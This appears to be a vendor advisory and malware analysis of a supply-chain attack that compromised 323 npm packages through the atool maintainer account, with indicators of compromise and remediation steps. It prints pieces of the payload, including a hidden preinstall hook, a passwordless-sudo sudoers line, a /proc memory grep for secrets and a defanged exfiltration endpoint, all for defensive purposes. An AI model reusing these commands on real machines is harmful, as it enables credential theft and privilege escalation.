Table of contents
Mini Shai-Hulud Hits @antv: 323 npm Packages Compromised Through the atool Maintainer Account
An active supply chain attack has compromised 323 npm packages published under the atool npm maintainer account. The wave sweeps the entire @antv data-visualization organization alongside standalone libraries with wide independent adoption: echarts-for-react, timeago.js, size-sensor, and canvas-nest.js. With echarts-for-react pulling roughly 1.1 million weekly downloads, any project that auto-updates these packages is in scope. The attack follows the established Mini Shai-Hulud pattern: once a maintainer account is compromised, every package it can reach gets a malicious version in the same wave.
What’s new in this wave
This wave follows the established Mini Shai-Hulud pattern of large-scale malicious publishing through a compromised maintainer account. Volume is the point, pushing hundreds of packages at once to obscure individual bad releases inside normal registry traffic. What’s new is the account that got hit.
atool is the publishing identity for @antv, a foundational charting and data-visualization stack used across dashboards and analytics tools built in React and Vue, plus a cluster of standalone libraries with substantial independent adoption. The affected set spans the major @antv packages (g2, g6, x6, l7, s2, f2, g, g2plot, graphin, data-set) alongside echarts-for-react, timeago.js, size-sensor, and canvas-nest.js. echarts-for-react in particular sits as a direct dependency in a large number of React projects, most of which don’t pin to an exact version.
Technical analysis
What changed in the malicious releases
Three modifications appear consistently across the compromised versions.
Obfuscated index.js at the package root
The malicious release injects a single-line, ~490KB file built around a 1,728-entry string table with hex-encoded variable names:
const _0x5d6bea=_0x1169;(function(_0x3187cf,_0x895a8e){const _0x5f2282=...preinstall Hook
The malicious package adds a preinstall lifecycle hook:
"preinstall": "bun run index.js"npm runs preinstall automatically at install time, before application code is imported or tests run. The attacker calls bun run rather than node, sidestepping script-scanning tools that key on Node.js invocations.
@antv/setup Dependency pin advanced
The pinned git reference in optionalDependencies shifts from 7cb42f57561c321ecb09b4552802ae0ac55b3a7a to 1916faa365f2788b6e193514872d51a242876569, pulling in attacker-controlled code as a second stage alongside the root-level payload.
Obfuscation
The payload uses three layers. The string table uses a custom base64 alphabet with lowercase characters before uppercase, reversing the standard order. A self-executing function at startup rotates the table by 227 positions to the correct offset.
Configuration values including the C2 domain, exfiltration paths, and environment variable names are encrypted using PBKDF2-SHA256 key derivation at 200,000 iterations with 32-byte output, feeding a custom substitution cipher built on Fisher-Yates-shuffled permutation tables applied in three rounds.
Execution and persistence
On first run, the payload forks a detached child process with __DAEMONIZED=1 set in the environment and exits the parent immediately. The preinstall hook appears to complete normally while the child continues running in the background. A PID lock file at <tmpdir>/tmp.0987654321.lock prevents concurrent instances.
The string table contains .claude/setup.mjs, .vscode/setup.mjs, and the invocation bun run .claude/, pointing to Claude Code and VS Code local configuration directories as persistence targets. This is also why bun is a hard requirement on the target machine beyond the initial preinstall hook. The payload includes an installTokenMonitor function, indicating ongoing token monitoring rather than a one-shot collection pass.
For CI runner environments, the payload contains:
echo 'runner ALL=(ALL) NOPASSWD:ALL' > /mnt/runner && chmod 0440 /mnt/runnerwhich would create passwordless sudo access for the runner user.
Credential collection
The payload targets cloud and infrastructure credentials including AWS credentials, GitHub tokens, GitHub Actions OIDC tokens, HashiCorp Vault tokens, and Kubernetes secrets.
It also targets developer machine files such as SSH keys, package registry tokens, .env files, password managers, shell history, and Claude Code configuration.
For CI environments, masked GitHub Actions secrets are read directly from runner process memory via a getLinuxDumpScript function using:
tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}'against:
/proc/<pid>/memExfiltration
Collected data is sent over two channels.
The primary channel is an HTTPS POST to:
t[.]m-kosche[.]comat path:
/api/public/otel/v1/tracesa path that mimics an OpenTelemetry traces endpoint, the kind of outbound HTTPS traffic that appears in virtually every modern cloud application’s network logs and rarely triggers alerting.
The User-Agent is hardcoded to:
python-requests/2.31.0to avoid detection logic that keys on Node.js as the runtime.
The secondary channel uses collected GitHub tokens to commit stolen data via the GitHub API, using:
fix: cias the commit message.
Indicators of compromise
Network
| Indicator | Value |
|---|---|
| C2 domain | t[.]m-kosche[.]com |
| Exfiltration path | /api/public/otel/v1/traces |
| Spoofed User-Agent | python-requests/2.31.0 |
| IMDS probe | hxxp://169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/ |
| ECS metadata probe | hxxp://169[.]254[.]170[.]2 |
Filesystem
| Path | Description |
|---|---|
<tmpdir>/tmp.0987654321.lock | PID lock file written at startup |
.claude/setup.mjs | Claude Code persistence path string in payload |
.vscode/setup.mjs | VS Code persistence path string in payload |
Process / Behavioral
| Indicator | Description |
|---|---|
__DAEMONIZED=1 env var | Set on the detached child process |
bun run index.js in preinstall | Activation hook in package.json |
/proc/<pid>/mem read + isSecret grep | In-memory secrets scraping on Linux runners |
fix: ci commit message | GitHub exfiltration commits |
Package
| Indicator | Value |
|---|---|
Malicious @antv/setup commit ref | 1916faa365f2788b6e193514872d51a242876569 |
Previously clean @antv/setup commit ref | 7cb42f57561c321ecb09b4552802ae0ac55b3a7a |
What to do
- Audit the dependency tree. Run:
npm lsto surface transitive pulls. echarts-for-react and any @antv/* package are the primary targets, but transitive exposure through other libraries is common.
- Pin to known-good versions. Roll back to the last release published before this wave and lock it in
package-lock.jsonorpnpm-lock.yaml. - Rotate all credentials on any machine that ran:
npm installagainst a flagged version. Execution happens at install time through the preinstall hook; a machine is compromised whether or not the affected package was ever imported.
Rotate npm and PyPI tokens, GitHub tokens, AWS credentials, Vault tokens, Kubernetes service account tokens, SSH keys, and any secrets stored in .env files or shell history.
- Check for persistence artifacts. Inspect:
<tmpdir>/tmp.0987654321.lock
.claude/setup.mjs
.vscode/setup.mjsOn CI runners, audit the sudoers configuration for:
runner ALL=(ALL) NOPASSWD:ALLentries under:
/etc/sudoers.d/
/mnt/runner- Block automatic upgrades for
@antv/*and the related packages until the legitimate maintainer confirms a clean release line. Disablepreinstallandpostinstallscript execution in CI with:
npm install --ignore-scriptsas a durable defense against this class of attack.
Conclusion
This wave is the established Mini Shai-Hulud playbook applied to a higher-profile account. The techniques – broad credential collection, CI targeting, persistence, security-tool evasion – are consistent with prior waves. What changes is the reach: compromising the atool account puts the entire @antv ecosystem and several high-download standalone libraries in scope at once.
Mend.io coverage
Mend.io has issued five MSC advisories covering all 323 affected packages:
- MSC-2026-5740
- MSC-2026-5736
- MSC-2026-5737
- MSC-2026-5738
- MSC-2026-5739
Manage open source risk
About the author
